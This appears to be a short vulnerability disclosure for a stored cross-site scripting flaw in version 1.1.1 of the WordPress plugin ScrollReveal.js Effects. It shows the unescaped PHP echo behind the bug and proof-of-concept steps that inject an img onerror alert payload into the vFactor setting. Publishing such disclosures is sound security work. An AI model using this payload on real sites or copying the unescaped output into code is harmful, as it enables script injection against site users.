Headline
WordPress ScrollReveal.js Effects 1.1.1 Cross Site Scripting
WordPress ScrollReveal.js Effects plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.
# Exploit Title: WordPress Plugin ScrollReveal.js Effects - Stored Cross Site Scripting# Date: 25-04-2022# Exploit Author: Mariam Tariq - Hunt3rsherlock_# Vendor Homepage: https://wordpress.org/plugins/scrollrevealjs-effects/# Version: 1.1.1# Tested on: Firefox# Contact me: [email protected]# Vulnerable Code: ``` <input id="src-opacity" type="text" name="sr_config[vFactor]" value="<?phpecho $options['vFactor']; ?>" placeholder="Element ratio in float" />```# POC1. Install ScrollReveal.js Effects WordPress plugin and activate.2. Go to configuration and on vFactor field inject XSS payload “><img src=xonerror=alert(‘’XSS>3. XSS will trigger.## PoC Imagehttps://imgur.com/a/uQRT2mDhttps://imgur.com/1BB80ep